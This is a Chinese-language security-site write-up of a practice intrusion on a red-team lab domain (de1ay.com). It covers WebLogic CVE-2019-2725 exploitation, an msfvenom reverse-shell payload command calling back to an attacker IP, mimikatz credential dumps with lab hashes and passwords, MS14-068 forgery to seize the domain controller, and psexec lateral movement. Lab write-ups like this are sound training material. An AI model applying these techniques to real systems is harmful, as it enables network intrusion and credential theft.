一次内网渗透靶场演练 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com
登录   |   注册

一次内网渗透靶场演练

安全狗 资讯 2020-08-27 17:07:06
793888
收藏

导语:近日拿到红日团队第二套红队靶场,恰好还在学习内网知识,便搭建后拿来作为练手的环境,检测近一段时间的学习成果以便发现不足之处。

近日拿到红日团队第二套红队靶场,恰好还在学习内网知识,便搭建后拿来作为练手的环境,检测近一段时间的学习成果以便发现不足之处。

靶场拓扑

图片1.png 

一、入口信息收集

使用nmap对web服务器进行端口扫描:

PORT      STATE SERVICE            VERSION

80/tcp    open  http               Microsoft IIS httpd 7.5

| http-methods:

|   Supported Methods: OPTIONS TRACE GET HEAD POST

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/7.5

|_http-title: Site doesn't have a title.

135/tcp   open  msrpc              Microsoft Windows RPC

139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds       Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds

3389/tcp  open  ssl/ms-wbt-server?

|_ssl-date: 2020-05-25T21:52:56+00:00; -8h00m00s from scanner time.

7001/tcp  open  http               Oracle WebLogic Server (Servlet 2.5; JSP 2.1)

|_http-title: Error 404--Not Found

49152/tcp open  msrpc              Microsoft Windows RPC

49153/tcp open  msrpc              Microsoft Windows RPC

49154/tcp open  msrpc              Microsoft Windows RPC

49202/tcp open  msrpc              Microsoft Windows RPC

49222/tcp open  msrpc              Microsoft Windows RPC

MAC Address: 00:0C:29:8B:09:71 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7

OS details: Microsoft Windows 7

Uptime guess: 0.144 days (since Mon May 25 22:27:15 2020)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=260 (Good luck!)

IP ID Sequence Generation: Incremental

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

 

Host script results:

|_clock-skew: mean: -9h59m59s, deviation: 3h59m59s, median: -8h00m00s

| smb-os-discovery:

|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)

|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1

|   Computer name: WEB

|   NetBIOS computer name: WEB\x00

|   Domain name: de1ay.com

|   Forest name: de1ay.com

|   FQDN: WEB.de1ay.com

|_  System time: 2020-05-26T05:52:16+08:00

| smb-security-mode:

|   account_used:

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: disabled (dangerous, but default)

| smb2-security-mode:

|   2.02:

|_    Message signing enabled but not required

| smb2-time:

|   date: 2020-05-25T21:52:15

|_  start_date: 2020-05-25T18:27:44

因为开放了135、139、445端口,尝试对域信息进行收集,但是结果并不理想。

image.png

对信息做些整理:

开放端口:80、135、139、445、1433、3389、7001
域环境: de1ay.com
相关服务名称及版本:
    Microsoft SQL Server 2008 R2 10.50.4000; SP2
    Microsoft IIS httpd 7.5
系统: Windows Server 2008 R2 Standard 7601 Service Pack 1

二、利用weblogic漏洞获取立足点

想从80端口下手,直接访问页面是空白的,再对目录进行探测,发现也没有有用的目录或者文件。
尝试MS17-010:
这里先用MSF的scanner/smb/smb_ms17_010进行探测

image.png

紧接着使用windows/smb/ms17_010_eternalblue模块进行攻击:

image.png

连续好几次都不行,错误的原因都是对方断开连接,猜测可能有WAF或者AV
再尝试下7001端口,发现是weblogic服务:

image.png

扫描目录有新发现:

image.png

image.png

尝试爆破弱口令未果,尝试使用漏洞检测工具对其进行检测,发现存在CVE-2019-2725

image.png

这里尝试用msf的multi/misc/weblogic_deserialize_asyncresponseservice但是失败了:

image.png

再看所携带的payload:

image.png

很明显,设置的payload是针对unix环境的,在windows的环境自然没办法反弹回shell。
解决方法:
1、去https://www.exploit-db.com/exploits/46780下载exp
2、用以下命令生成一个反弹shell的powershell脚本:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.98.98 LPORT=8877 -f psh-cmd > reverse.ps1

image.png

3、替换payload中的exploit变量为生成的ps1脚本内容。

4、在msf中设置一个监听脚本后再用exp打目标,成功后能得到一个session

image.png

由于个人比较喜欢用cs来对windows环境进行后续的渗透,因此派生了个shell给cs。

三、深入内网

对环境信息开始进行收集:
当前身份信息收集:

image.png

服务器的IP信息:

image.png

因为目前身份权限比较低并且不能探测域内的信息(非域用户)。
再看看打了哪些补丁:

image.png

获取用户hash:

Authentication Id : 0 ; 2837076 (00000000:002b4a54)

Session           : Interactive from 2

User Name         : de1ay

Domain            : WEB

Logon Server      : WEB

Logon Time        : 2020/5/26 3:38:35

SID               : S-1-5-21-3767205380-3469466069-2137393323-1000

msv :

 [00000003] Primary

 * Username : de1ay

 * Domain   : WEB

 * LM       : f67ce55ac831223dc187b8085fe1d9df

 * NTLM     : 161cff084477fe596a5db81874498a24

 * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d

tspkg :

 * Username : de1ay

 * Domain   : WEB

 * Password : 1qaz@WSX

wdigest :

 * Username : de1ay

 * Domain   : WEB

 * Password : 1qaz@WSX

kerberos :

 * Username : de1ay

 * Domain   : WEB

 * Password : 1qaz@WSX

ssp :

credman :

 

Authentication Id : 0 ; 2837042 (00000000:002b4a32)

Session           : Interactive from 2

User Name         : de1ay

Domain            : WEB

Logon Server      : WEB

Logon Time        : 2020/5/26 3:38:35

SID               : S-1-5-21-3767205380-3469466069-2137393323-1000

msv :

 [00000003] Primary

 * Username : de1ay

 * Domain   : WEB

 * LM       : f67ce55ac831223dc187b8085fe1d9df

 * NTLM     : 161cff084477fe596a5db81874498a24

 * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d

tspkg :

 * Username : de1ay

 * Domain   : WEB

 * Password : 1qaz@WSX

wdigest :

 * Username : de1ay

 * Domain   : WEB

 * Password : 1qaz@WSX

kerberos :

 * Username : de1ay

 * Domain   : WEB

 * Password : 1qaz@WSX

ssp :

credman :

 

Authentication Id : 0 ; 2454896 (00000000:00257570)

Session           : Interactive from 1

User Name         : mssql

Domain            : DE1AY

Logon Server      : DC

Logon Time        : 2020/5/26 11:29:47

SID               : S-1-5-21-2756371121-2868759905-3853650604-2103

msv :

 [00000003] Primary

 * Username : mssql

 * Domain   : DE1AY

 * LM       : f67ce55ac831223dc187b8085fe1d9df

 * NTLM     : 161cff084477fe596a5db81874498a24

 * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d

tspkg :

 * Username : mssql

 * Domain   : DE1AY

 * Password : 1qaz@WSX

wdigest :

 * Username : mssql

 * Domain   : DE1AY

 * Password : 1qaz@WSX

kerberos :

 * Username : mssql

 * Domain   : DE1AY.COM

 * Password : 1qaz@WSX

ssp :

credman :

这里发现有域用户 DE1AY\mssql。于是到当前进程中查看是否有该用户的进程。但是很遗憾并没有:

image.png
image.png

于是这里使用spawn来切换用户(密码已经使用mimikatz工具dump出来)。

image.png

切换成功后也可以看到此时的身份是域用户:

image.png

四、拿下域控权限

将用户切换成域用户之后便开始收集域相关的信息:

image.png

image.png

image.png

确定域控服务器的IP:

image.png

整理一下域的相关信息:
域控:DC(10.10.10.10)
域成员: Administrator、de1ay、krbtgt、mssql
域管理员:Administrator
域内服务器、工作站:PC$、WEB$

通过内网扫描得知存活的主机有3台:

image.png

在对10.10.10.0/24网段的主机进行端口扫描,得知:

10.10.10.201:3389
10.10.10.201:139
10.10.10.201:135
10.10.10.201:445
================
10.10.10.10:5985
10.10.10.10:3389
10.10.10.10:636
10.10.10.10:593
10.10.10.10:464
10.10.10.10:389
10.10.10.10:139
10.10.10.10:135
10.10.10.10:88
10.10.10.10:53
10.10.10.10:445 (platform: 500 version: 6.3 name: DC domain: DE1AY)

现在用mssql的账户去登录域控显然不可能,所以可以尝试ms14-068(因为从刚才的systeminfo信息看到,已经打上的补丁并没有ms14-068对应的编号)。

 image.png

image.png

注入成功后尝试 dir \\10.10.10.10\c$,发现能成功,便采用cs的psexec让域控上线

image.png

image.png

image.png

这里还是上传个mimikatz把管理员的hash或者密码dump下来:

Authentication Id : 0 ; 303084 (00000000:00049fec)

Session           : Interactive from 1

User Name         : administrator

Domain            : DE1AY

Logon Server      : DC

Logon Time        : 2020/5/26 3:32:38

SID               : S-1-5-21-2756371121-2868759905-3853650604-500

msv :

 [00000003] Primary

 * Username : Administrator

 * Domain   : DE1AY

 * NTLM     : cf83cd7efde13e0ce754874aaa979a74

 * SHA1     : a2dc253087c47bce0db3f5931635212dbfdb9e77

 [00010000] CredentialKeys

 * NTLM     : cf83cd7efde13e0ce754874aaa979a74

 * SHA1     : a2dc253087c47bce0db3f5931635212dbfdb9e77

tspkg :

wdigest :

 * Username : Administrator

 * Domain   : DE1AY

 * Password : (null)

kerberos :

 * Username : administrator

 * Domain   : DE1AY.COM

 * Password : (null)

ssp : KO

credman :

 

Authentication Id : 0 ; 87692 (00000000:0001568c)

Session           : Interactive from 1

User Name         : DWM-1

Domain            : Window Manager

Logon Server      : (null)

Logon Time        : 2020/5/26 3:29:06

SID               : S-1-5-90-1

msv :

 [00000003] Primary

 * Username : DC$

 * Domain   : DE1AY

 * NTLM     : f4279db634f00ca3f5777e0b854547ec

 * SHA1     : cba60160e129a91eece1c9dea521671bb7edb688

tspkg :

wdigest :

 * Username : DC$

 * Domain   : DE1AY

 * Password : (null)

kerberos :

 * Username : DC$

 * Domain   : de1ay.com

 * Password : 5c 94 06 ab 7a 40 8e b2 34 66 7f 28 25 ed 49 d6 19 b9 83 99 dc 9f 5f 1d 9f 65 58 d4 f1 42 a8 6c 41 56 0e 22 1d ff c2 33 12 64 ac 33 c2 71 d8 80 62 09 2e 43 e2 fb 52 e1 b9 1a f8 b3 c5 84 f9 f9 ab 60 0f 6b 6f 86 57 b6 9f 12 c0 9c d4 33 8d bd a3 80 d5 de 59 80 2e d5 aa 65 fa 30 89 15 02 af 35 d1 a6 1b cb 28 19 49 77 44 b9 a0 67 e1 8f e6 63 74 8b 58 51 32 8b 88 6c 63 e9 22 76 3d d0 b3 b1 d1 00 c3 38 a1 8a 66 59 6d 48 55 32 19 0f 8c 5c 3d c0 de 72 bd 89 bb 11 41 6f be 15 9d 41 8f a2 9d be f1 90 52 1e 66 4f cf e8 5c 47 a8 96 06 2b 3a d1 5c ff c4 e9 77 0f 30 b4 2f 59 9f fc 21 79 22 06 c0 53 b3 9f 14 72 66 75 7c c4 3e a8 f9 be 8b 08 8c b0 d3 a0 6b da b9 d9 59 ae af f4 03 f4 18 76 d0 c9 bc 58 d1 42 d6 a9 5d a3 ae 84 81

ssp : KO

credman :

五、利用域管账号扩大战果

既然有了管理员的账号,同样用psexec把pc机拿下:

image.png

至此拿下了全部靶机。

六、总结

本次在外部边界的突破依赖于weblogic的漏洞,控制web应用服务器后通过dump出账号密码将当前用户切换为域用户,通过ms14-068来伪造域管理员身份拿下域控,进而获得真正的域管理员账号信息,再通过其对其他域内主机进行横向。

内网安全是很多企业所忽视的环节,由于系统补丁更新不及时、人员安全意识薄弱,所以导致一旦被外部攻破就很容易在内网畅通无阻。因此建议企业需要注重内网的安全防护,增加流量监测设备、入侵告警、入侵防护设备;企业员工定期组织安全意识培训等。

如若转载,请注明原文地址:
  • 分享至
  •
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 

你可能感兴趣的

公司简介 | 我要投稿 | 更新日志 | 友情链接 | 隐私政策 |
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务